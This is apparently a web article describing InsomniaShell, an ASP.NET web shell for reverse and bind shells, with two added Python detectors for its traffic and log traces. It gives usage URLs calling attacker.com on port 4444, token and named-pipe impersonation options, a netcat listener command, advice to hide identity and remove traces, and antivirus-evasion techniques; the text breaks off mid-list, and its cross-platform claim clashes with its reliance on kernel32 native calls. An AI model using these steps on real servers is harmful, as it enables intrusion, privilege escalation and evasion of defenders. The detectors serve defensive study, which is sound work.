InsomniaShell: A Stealthy and Flexible Tool for ASP.NET Reverse and Bind Shells







If you are looking for a tool that can help you gain remote access to a web server running ASP.NET, you may want to check out InsomniaShell. InsomniaShell is a tool for use during penetration tests, when you have the ability to upload or create an arbitrary .aspx page on the target server. This .aspx page is an example of using native calls through pinvoke to provide either an ASP.NET reverse shell or a bind shell. In this article, we will explain what InsomniaShell is, how it works, and how you can use it for ethical hacking purposes.







What is InsomniaShell and what does it do?




InsomniaShell is a tool developed by k4u5h41 on GitHub. It is based on the original code by Darknet. It allows you to create a reverse or bind shell on a web server running ASP.NET. A reverse shell is a type of networking setup where the target machine initiates an outgoing connection to the attacker's machine and establishes a shell session. A bind shell is a type of networking setup where the attacker connects to a listening port on the target machine and obtains a shell session. Both types of shells enable the attacker to execute commands on the target machine and access its resources.


What is ASP.NET and why is it used for web development?




ASP.NET is an open source web framework, created by Microsoft, for building modern web apps and services with .NET. ASP.NET is cross platform and runs on Windows, Linux, macOS, and Docker. ASP.NET supports many different development models, such as Web Forms, MVC, Web Pages, API, and Core. ASP.NET pages have the extension .aspx and are normally written in C# or VB.NET. ASP.NET is built on the Common Language Runtime (CLR), allowing programmers to write ASP.NET code using any supported .NET language.


ASP.NET is widely used for web development because it offers many benefits, such as:


  • High performance and scalability



  • Rich set of controls and libraries



  • Easy integration with databases and web services



  • Support for multiple languages and platforms



  • Security features such as authentication, authorization, encryption, etc.



  • Debugging and testing tools



  • Open source and community-driven



What are reverse shell and bind shell and how do they differ?




A reverse shell and a bind shell are two common techniques for creating backdoors and maintaining persistence on a target machine. They allow an attacker to gain remote access to a system shell and execute commands on the target machine. However, they differ in how they establish the connection between the attacker and the target.


Type: Reverse shell

Description: The target machine initiates an outgoing connection to the attacker's machine and establishes a shell session.

Advantages:

  • Bypasses firewall rules that block incoming connections

  • Works well with NAT and dynamic IP addresses

  • Can be initiated by a simple HTTP request or other methods

Disadvantages:

  • Requires the attacker's machine to be online and listening

  • May be detected by outgoing traffic monitoring

  • May be blocked by egress filtering or proxy servers


Type: Bind shell

Description: The target machine opens a listening port and waits for the attacker to connect and obtain a shell session.

Advantages:

  • Does not depend on the attacker's machine being online or listening

  • Less likely to be detected by outgoing traffic monitoring

  • Works well with static IP addresses

Disadvantages:

  • May be blocked by firewall rules that restrict incoming connections

  • May be detected by port scanning or listening services

  • Does not work well with NAT or dynamic IP addresses


Both reverse shell and bind shell have their pros and cons, and the choice of which one to use depends on the situation and the goal of the attacker. In general, reverse shells are more popular and effective than bind shells, as they can bypass most firewall restrictions and work with any type of IP address.
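
The two connection directions compared above look different in a web server's socket table, which is what the "may be detected" entries refer to. The following is an added example, not part of the original article or of InsomniaShell: it classifies a constructed socket snapshot, flagging unexpected listeners (the bind pattern) and outbound connections from the web worker to destinations outside an egress allowlist (the reverse pattern). The worker name w3wp.exe (the IIS worker process), the record layout, the allowlists and the function name are assumptions of this example.

```python
from ipaddress import ip_address, ip_network

# Assumptions of this example: service ports, egress allowlist, worker name.
EXPECTED_LISTENERS = {80, 443}
EGRESS_ALLOWLIST = [ip_network("10.0.5.0/24")]   # e.g. a database subnet
WEB_WORKERS = {"w3wp.exe"}                        # IIS worker process

# Constructed socket-table snapshot:
# (process, state, local_port, remote_ip, remote_port)
SNAPSHOT = [
    ("System",   "LISTENING",   443,   None,           None),
    ("w3wp.exe", "ESTABLISHED", 49812, "10.0.5.20",    1433),
    ("w3wp.exe", "LISTENING",   5555,  None,           None),
    ("w3wp.exe", "ESTABLISHED", 49877, "198.51.100.7", 4444),
    ("System",   "ESTABLISHED", 443,   "203.0.113.5",  51544),
]

def classify(snapshot):
    """Return findings for listener and egress anomalies in the snapshot."""
    listeners = {lp for _, st, lp, _, _ in snapshot if st == "LISTENING"}
    findings = []
    for proc, state, lport, rip, rport in snapshot:
        if state == "LISTENING":
            # A listener outside the expected service ports: bind pattern.
            if lport not in EXPECTED_LISTENERS:
                findings.append(("bind-pattern", proc, lport))
        elif state == "ESTABLISHED" and lport not in listeners:
            # Local port is not a listener, so this host initiated the
            # connection. A web worker dialing out to a non-allowlisted
            # address matches the reverse pattern.
            allowed = any(ip_address(rip) in net for net in EGRESS_ALLOWLIST)
            if proc in WEB_WORKERS and not allowed:
                findings.append(("reverse-pattern", proc, f"{rip}:{rport}"))
    return findings

if __name__ == "__main__":
    for finding in classify(SNAPSHOT):
        print(finding)
```
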


How to use InsomniaShell for penetration testing




InsomniaShell is a tool that can help you create a reverse or bind shell on a web server running ASP.NET. To use InsomniaShell, you need to have the ability to upload or create an arbitrary .aspx page on the target server. This can be done by exploiting a file upload vulnerability, a remote code execution vulnerability, or a misconfigured web server. Once you have uploaded or created the .aspx page, you can access it from your browser or a command line tool such as curl or wget. The .aspx page will execute native calls through pinvoke to provide either a reverse or bind shell, depending on the parameters you pass to it.


The parameters for InsomniaShell are as follows:


  • mode: either "reverse" or "bind" to specify the type of shell



  • ip: the IP address of the attacker's machine (for reverse shell) or the target machine (for bind shell)



  • port: the port number to use for the connection



  • token: an optional parameter to search for SYSTEM or Administrator tokens for impersonation



  • pipe: an optional parameter to perform a named pipe impersonation attack on a local SQL Server instance



For example, if you want to create a reverse shell on port 4444, you can use the following URL:


http://target.com/insomnia.aspx?mode=reverse&ip=attacker.com&port=4444


If you want to create a bind shell on port 5555, you can use the following URL:


http://target.com/insomnia.aspx?mode=bind&ip=target.com&port=5555


If you want to search for SYSTEM or Administrator tokens for impersonation, you can add the token parameter with any value, such as:


http://target.com/insomnia.aspx?mode=reverse&ip=attacker.com&port=4444&token=yes


If you want to perform a named pipe impersonation attack on a local SQL Server instance, you can add the pipe parameter with the name of the pipe, such as:


http://target.com/insomnia.aspx?mode=reverse&ip=attacker.com&port=4444&pipe=MSSQL$SQLEXPRESS


Once you have accessed the .aspx page with the appropriate parameters, you should receive a shell session on your machine. You can use any tool that supports TCP connections, such as netcat, socat, ncat, etc. For example, if you are using netcat, you can run the following command on your machine:


nc -lvp 4444


This will listen on port 4444 and wait for the connection from the target machine. Once connected, you can execute commands on the target machine and access its resources.
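
Requests of the form shown above leave a recognizable trace in web server logs. The following is an added example, not part of the original article or of InsomniaShell: it scans W3C extended log lines for .aspx requests whose query string carries the mode, ip and port parameters as this article describes them. The log lines are constructed, the function name is hypothetical, and the field order is read from the log's own #Fields header; a renamed page or parameters sent in a POST body would not match, so treat a hit as one signal among several.

```python
from urllib.parse import parse_qs

# Constructed IIS-style W3C extended log (documentation-range addresses).
SAMPLE_LOG = """\
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status
2024-05-01 10:00:01 GET /default.aspx id=7 203.0.113.5 200
2024-05-01 10:02:13 GET /uploads/x9f2.aspx mode=reverse&ip=198.51.100.7&port=4444 203.0.113.9 200
2024-05-01 10:03:40 GET /uploads/x9f2.aspx mode=bind&ip=192.0.2.10&port=5555&token=yes 203.0.113.9 200
2024-05-01 10:04:02 GET /report.aspx mode=print&page=2 203.0.113.5 200
2024-05-01 10:05:00 POST /search.aspx - 203.0.113.5 200
"""

def find_shell_requests(log_text):
    """Return one dict per request matching the mode/ip/port pattern."""
    fields, hits = [], []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]          # column names for later rows
            continue
        if not line or line.startswith("#") or not fields:
            continue
        rec = dict(zip(fields, line.split()))
        if not rec.get("cs-uri-stem", "").lower().endswith(".aspx"):
            continue
        qs = parse_qs(rec.get("cs-uri-query", ""), keep_blank_values=True)
        q = {k.lower(): v[0] for k, v in qs.items()}
        mode = q.get("mode", "").lower()
        # Require all three parameters so ordinary "mode=" pages do not match.
        if mode in ("reverse", "bind") and "ip" in q and q.get("port", "").isdigit():
            hits.append({
                "when": f'{rec.get("date")} {rec.get("time")}',
                "client": rec.get("c-ip"),
                "path": rec["cs-uri-stem"],
                "mode": mode,
                "ip": q["ip"],
                "port": int(q["port"]),
                "extras": sorted(k for k in ("token", "pipe") if k in q),
            })
    return hits

if __name__ == "__main__":
    for hit in find_shell_requests(SAMPLE_LOG):
        print(hit)
```
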


Advantages and disadvantages of InsomniaShell




InsomniaShell is a simple and effective tool for creating reverse or bind shells on ASP.NET web servers. However, like any tool, it has its advantages and disadvantages. Here are some of them:


Advantages of InsomniaShell




  • It is easy to use and does not require any installation or configuration on the target machine.



  • It is cross-platform and works on Windows, Linux, macOS, and Docker environments that support ASP.NET.



  • It is stealthy and does not create any files or registry entries on the target machine.



  • It is flexible and allows you to choose between reverse or bind shell, as well as perform token or pipe impersonation.



Disadvantages of InsomniaShell




  • It requires the target machine to have the .NET framework installed and enabled.



  • It may trigger antivirus or firewall alerts on the target machine or the network.



  • It has limited functionality and does not support features such as file transfer, port forwarding, tunneling, etc.



Conclusion




InsomniaShell is a tool that can help you create a reverse or bind shell on a web server running ASP.NET. It is useful for penetration testing and ethical hacking purposes, when you have the ability to upload or create an arbitrary .aspx page on the target server. It allows you to execute native calls through pinvoke to provide either an ASP.NET reverse shell or a bind shell. It also supports token and pipe impersonation for privilege escalation. However, it also has some drawbacks, such as requiring the .NET framework, triggering antivirus or firewall alerts, and having limited functionality.


If you want to use InsomniaShell for your own projects, you should follow some tips and best practices, such as:


  • Always use InsomniaShell with permission and for legal purposes only.



  • Always test InsomniaShell on your own machines before using it on a target machine.



  • Always use a VPN or a proxy to hide your IP address and protect your identity.



  • Always use a random and unique name for the .aspx page to avoid detection and suspicion.



  • Always delete the .aspx page after you are done with the shell session.



We hope you enjoyed this article and learned something new about InsomniaShell, ASP.NET, and reverse shells. If you want to download InsomniaShell or learn more about it, you can visit its GitHub repository. If you have any questions or feedback, feel free to leave a comment below. Thank you for reading!


FAQs




Where can I download InsomniaShell?




You can download InsomniaShell from its GitHub repository. You can also clone it using git or download it as a zip file. The repository contains the source code and the compiled binary of InsomniaShell.


How can I prevent InsomniaShell from being detected by antivirus?




There is no guarantee that InsomniaShell will not be detected by antivirus, as different antivirus programs have different detection methods and signatures. However, you can try some techniques to evade antivirus detection, such as:


  • Obfuscating or encrypting the .aspx page code



  • Using a custom pinvoke library instead of kernel32.dll



  • Using alternative methods of creating processes or sockets



  • Using